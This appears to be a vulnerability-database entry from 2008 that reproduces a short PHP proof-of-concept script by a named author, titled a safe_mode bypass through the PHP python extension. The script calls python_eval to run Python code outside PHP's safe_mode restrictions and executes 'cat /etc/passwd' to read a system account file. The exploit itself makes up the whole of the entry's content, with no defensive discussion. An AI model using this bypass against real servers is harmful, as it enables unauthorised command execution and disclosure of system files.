Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21059
HistoryDec 21, 2008 - 12:00 a.m.

php python extension safe_mode bypass

2008-12-2100:00:00
vulners.com
30

<?php
/*
php_python_bypass.php
php python extension safe_mode bypass
Amir Salmani - amir[at]salmani[dot]ir
*/

//python ext. installed?
if (!extension_loaded('python')) die("python extension is not installed\n");

//eval python code
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system('cat /etc/passwd')
');

//show result
echo $res;
?>